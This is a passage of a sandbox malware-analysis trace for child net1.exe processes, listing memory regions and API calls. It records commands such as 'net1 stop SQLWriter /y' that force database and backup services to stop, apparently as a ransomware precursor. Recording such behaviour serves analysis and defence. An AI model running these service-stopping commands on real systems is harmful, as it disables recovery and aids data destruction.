= 11333 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 11334 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 11335 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 11336 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Thread: id = 833 os_tid = 0xbe0 Process: id = "318" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x20c0f000" os_pid = "0x8c8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "310" os_parent_pid = "0x80c" cmd_line = "C:\\Windows\\system32\\net1 stop svcGenericHost /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11337 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 11338 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 11339 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 11340 start_va = 0x150000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 11341 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11342 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 11343 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 11344 start_va = 0xff380000 end_va = 0xff3b2fff entry_point = 0xff380000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 11345 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 11346 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 11347 start_va = 0x7fffffd3000 end_va = 0x7fffffd3fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 11348 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 11373 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 11374 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 11375 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 11376 start_va = 0x1e0000 end_va = 0x2dffff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 11377 start_va = 0x380000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 11378 start_va = 0x390000 end_va = 0x48ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 11379 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 11380 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 11381 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 11382 start_va = 0x7fef43a0000 end_va = 0x7fef43b1fff entry_point = 0x7fef43a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 11383 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 11384 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 11385 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 11386 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 11387 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 11388 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 11389 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 11390 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 11391 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 11392 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 11393 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 11394 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 11395 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 11396 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 11397 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 11398 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 11399 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 835 os_tid = 0xd3c [0115.655] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cfcf0 | out: lpSystemTimeAsFileTime=0x1cfcf0*(dwLowDateTime=0xfa1310b0, dwHighDateTime=0x1d48689)) [0115.655] GetCurrentProcessId () returned 0x8c8 [0115.655] GetCurrentThreadId () returned 0xd3c [0115.655] GetTickCount () returned 0x2697b [0115.656] QueryPerformanceCounter (in: lpPerformanceCount=0x1cfcf8 | out: lpPerformanceCount=0x1cfcf8*=1816257400000) returned 1 [0115.656] GetModuleHandleW (lpModuleName=0x0) returned 0xff380000 [0115.656] __set_app_type (_Type=0x1) [0115.656] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff399c9c) returned 0x0 [0115.656] __getmainargs (in: _Argc=0xff3a4780, _Argv=0xff3a4790, _Env=0xff3a4788, _DoWildCard=0, _StartInfo=0xff3a479c | out: _Argc=0xff3a4780, _Argv=0xff3a4790, _Env=0xff3a4788) returned 0 [0115.657] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0115.657] GetConsoleOutputCP () returned 0x1b5 [0115.695] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff3acec0 | out: lpCPInfo=0xff3acec0) returned 1 [0115.695] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0115.697] sprintf_s (in: _DstBuf=0x1cfc98, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0115.697] setlocale (category=0, locale=".437") returned="English_United States.437" [0115.699] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0115.699] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0115.699] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop svcGenericHost /y" [0115.699] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1cfa30, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0115.699] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0115.699] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x1cfc88 | out: Buffer=0x1cfc88*=0x1f4d50) returned 0x0 [0115.699] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x1cfc88 | out: Buffer=0x1cfc88*=0x1fc100) returned 0x0 [0115.699] _fileno (_File=0x7fefdba2a80) returned 0 [0115.699] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0115.700] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0115.700] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0115.700] _wcsicmp (_String1="config", _String2="stop") returned -16 [0115.700] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0115.700] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0115.700] _wcsicmp (_String1="file", _String2="stop") returned -13 [0115.700] _wcsicmp (_String1="files", _String2="stop") returned -13 [0115.700] _wcsicmp (_String1="group", _String2="stop") returned -12 [0115.700] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0115.700] _wcsicmp (_String1="help", _String2="stop") returned -11 [0115.700] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0115.700] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0115.700] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0115.700] _wcsicmp (_String1="session", _String2="stop") returned -15 [0115.700] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0115.700] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0115.700] _wcsicmp (_String1="share", _String2="stop") returned -12 [0115.700] _wcsicmp (_String1="start", _String2="stop") returned -14 [0115.700] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0115.700] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0115.700] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0115.701] _wcsicmp (_String1="accounts", _String2="svcGenericHost") returned -18 [0115.701] _wcsicmp (_String1="computer", _String2="svcGenericHost") returned -16 [0115.701] _wcsicmp (_String1="config", _String2="svcGenericHost") returned -16 [0115.701] _wcsicmp (_String1="continue", _String2="svcGenericHost") returned -16 [0115.701] _wcsicmp (_String1="cont", _String2="svcGenericHost") returned -16 [0115.701] _wcsicmp (_String1="file", _String2="svcGenericHost") returned -13 [0115.701] _wcsicmp (_String1="files", _String2="svcGenericHost") returned -13 [0115.701] _wcsicmp (_String1="group", _String2="svcGenericHost") returned -12 [0115.701] _wcsicmp (_String1="groups", _String2="svcGenericHost") returned -12 [0115.701] _wcsicmp (_String1="help", _String2="svcGenericHost") returned -11 [0115.701] _wcsicmp (_String1="helpmsg", _String2="svcGenericHost") returned -11 [0115.701] _wcsicmp (_String1="localgroup", _String2="svcGenericHost") returned -7 [0115.701] _wcsicmp (_String1="pause", _String2="svcGenericHost") returned -3 [0115.701] _wcsicmp (_String1="session", _String2="svcGenericHost") returned -17 [0115.701] _wcsicmp (_String1="sessions", _String2="svcGenericHost") returned -17 [0115.701] _wcsicmp (_String1="sess", _String2="svcGenericHost") returned -17 [0115.701] _wcsicmp (_String1="share", _String2="svcGenericHost") returned -14 [0115.701] _wcsicmp (_String1="start", _String2="svcGenericHost") returned -2 [0115.702] _wcsicmp (_String1="stats", _String2="svcGenericHost") returned -2 [0115.702] _wcsicmp (_String1="statistics", _String2="svcGenericHost") returned -2 [0115.702] _wcsicmp (_String1="stop", _String2="svcGenericHost") returned -2 [0115.702] _wcsicmp (_String1="time", _String2="svcGenericHost") returned 1 [0115.702] _wcsicmp (_String1="user", _String2="svcGenericHost") returned 2 [0115.702] _wcsicmp (_String1="users", _String2="svcGenericHost") returned 2 [0115.702] _wcsicmp (_String1="msg", _String2="svcGenericHost") returned -6 [0115.702] _wcsicmp (_String1="messenger", _String2="svcGenericHost") returned -6 [0115.702] _wcsicmp (_String1="receiver", _String2="svcGenericHost") returned -1 [0115.702] _wcsicmp (_String1="rcv", _String2="svcGenericHost") returned -1 [0115.702] _wcsicmp (_String1="netpopup", _String2="svcGenericHost") returned -5 [0115.702] _wcsicmp (_String1="redirector", _String2="svcGenericHost") returned -1 [0115.702] _wcsicmp (_String1="redir", _String2="svcGenericHost") returned -1 [0115.702] _wcsicmp (_String1="rdr", _String2="svcGenericHost") returned -1 [0115.702] _wcsicmp (_String1="workstation", _String2="svcGenericHost") returned 4 [0115.702] _wcsicmp (_String1="work", _String2="svcGenericHost") returned 4 [0115.702] _wcsicmp (_String1="wksta", _String2="svcGenericHost") returned 4 [0115.702] _wcsicmp (_String1="prdr", _String2="svcGenericHost") returned -3 [0115.702] _wcsicmp (_String1="devrdr", _String2="svcGenericHost") returned -15 [0115.702] _wcsicmp (_String1="lanmanworkstation", _String2="svcGenericHost") returned -7 [0115.703] _wcsicmp (_String1="server", _String2="svcGenericHost") returned -17 [0115.703] _wcsicmp (_String1="svr", _String2="svcGenericHost") returned 15 [0115.703] _wcsicmp (_String1="srv", _String2="svcGenericHost") returned -4 [0115.703] _wcsicmp (_String1="lanmanserver", _String2="svcGenericHost") returned -7 [0115.703] _wcsicmp (_String1="alerter", _String2="svcGenericHost") returned -18 [0115.703] _wcsicmp (_String1="netlogon", _String2="svcGenericHost") returned -5 [0115.703] _wcsupr (in: _String="svcGenericHost" | out: _String="SVCGENERICHOST") returned="SVCGENERICHOST" [0115.703] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x1fce10 [0115.707] GetServiceKeyNameW (in: hSCManager=0x1fce10, lpDisplayName="SVCGENERICHOST", lpServiceName=0xff3a5750, lpcchBuffer=0x1cfba8 | out: lpServiceName="", lpcchBuffer=0x1cfba8) returned 0 [0115.708] _wcsicmp (_String1="msg", _String2="SVCGENERICHOST") returned -6 [0115.708] _wcsicmp (_String1="messenger", _String2="SVCGENERICHOST") returned -6 [0115.708] _wcsicmp (_String1="receiver", _String2="SVCGENERICHOST") returned -1 [0115.708] _wcsicmp (_String1="rcv", _String2="SVCGENERICHOST") returned -1 [0115.708] _wcsicmp (_String1="redirector", _String2="SVCGENERICHOST") returned -1 [0115.709] _wcsicmp (_String1="redir", _String2="SVCGENERICHOST") returned -1 [0115.709] _wcsicmp (_String1="rdr", _String2="SVCGENERICHOST") returned -1 [0115.709] _wcsicmp (_String1="workstation", _String2="SVCGENERICHOST") returned 4 [0115.709] _wcsicmp (_String1="work", _String2="SVCGENERICHOST") returned 4 [0115.709] _wcsicmp (_String1="wksta", _String2="SVCGENERICHOST") returned 4 [0115.709] _wcsicmp (_String1="prdr", _String2="SVCGENERICHOST") returned -3 [0115.709] _wcsicmp (_String1="devrdr", _String2="SVCGENERICHOST") returned -15 [0115.709] _wcsicmp (_String1="lanmanworkstation", _String2="SVCGENERICHOST") returned -7 [0115.709] _wcsicmp (_String1="server", _String2="SVCGENERICHOST") returned -17 [0115.709] _wcsicmp (_String1="svr", _String2="SVCGENERICHOST") returned 15 [0115.709] _wcsicmp (_String1="srv", _String2="SVCGENERICHOST") returned -4 [0115.709] _wcsicmp (_String1="lanmanserver", _String2="SVCGENERICHOST") returned -7 [0115.709] _wcsicmp (_String1="alerter", _String2="SVCGENERICHOST") returned -18 [0115.709] _wcsicmp (_String1="netlogon", _String2="SVCGENERICHOST") returned -5 [0115.709] NetServiceControl (in: servername=0x0, service="SVCGENERICHOST", opcode=0x0, arg=0x0, bufptr=0x1cfbb0 | out: bufptr=0x1cfbb0) returned 0x889 [0115.710] wcscpy_s (in: _Destination=0xff3a80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0115.710] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0115.711] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff3a5b50, nSize=0x800, Arguments=0xff3a7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0115.713] GetFileType (hFile=0xb) returned 0x2 [0115.713] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1cfa78 | out: lpMode=0x1cfa78) returned 1 [0115.713] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff3a5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x1cfa70, lpReserved=0x0 | out: lpBuffer=0xff3a5b50*, lpNumberOfCharsWritten=0x1cfa70*=0x1e) returned 1 [0115.714] GetFileType (hFile=0xb) returned 0x2 [0115.714] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1cfa78 | out: lpMode=0x1cfa78) returned 1 [0115.714] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff381efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1cfa70, lpReserved=0x0 | out: lpBuffer=0xff381efc*, lpNumberOfCharsWritten=0x1cfa70*=0x2) returned 1 [0115.714] _ultow (in: _Dest=0x889, _Radix=1899232 | out: _Dest=0x889) returned="2185" [0115.715] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff3a5b50, nSize=0x800, Arguments=0xff3a7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0115.715] GetFileType (hFile=0xb) returned 0x2 [0115.715] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1cfa78 | out: lpMode=0x1cfa78) returned 1 [0115.715] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff3a5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x1cfa70, lpReserved=0x0 | out: lpBuffer=0xff3a5b50*, lpNumberOfCharsWritten=0x1cfa70*=0x34) returned 1 [0115.715] GetFileType (hFile=0xb) returned 0x2 [0115.716] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1cfa78 | out: lpMode=0x1cfa78) returned 1 [0115.716] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff381efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1cfa70, lpReserved=0x0 | out: lpBuffer=0xff381efc*, lpNumberOfCharsWritten=0x1cfa70*=0x2) returned 1 [0115.716] NetApiBufferFree (Buffer=0x1f4d50) returned 0x0 [0115.716] NetApiBufferFree (Buffer=0x1fc100) returned 0x0 [0115.717] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop svcGenericHost /y" [0115.717] exit (_Code=2) Process: id = "319" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x6cd2f000" os_pid = "0xd84" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "305" os_parent_pid = "0xa50" cmd_line = "C:\\Windows\\system32\\net1 stop SQLWriter /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11349 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 11350 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 11351 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 11352 start_va = 0x130000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 11353 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11354 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 11355 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 11356 start_va = 0xff380000 end_va = 0xff3b2fff entry_point = 0xff380000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 11357 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 11358 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 11359 start_va = 0x7fffffd6000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 11360 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 11426 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 11427 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 11428 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 11429 start_va = 0x290000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 11430 start_va = 0x310000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 11431 start_va = 0x410000 end_va = 0x50ffff entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 11432 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 11433 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 11434 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 11435 start_va = 0x7fef43a0000 end_va = 0x7fef43b1fff entry_point = 0x7fef43a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 11436 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 11437 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 11438 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 11439 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 11440 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 11441 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 11442 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 11443 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 11444 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 11445 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 11446 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 11447 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 11448 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 11449 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 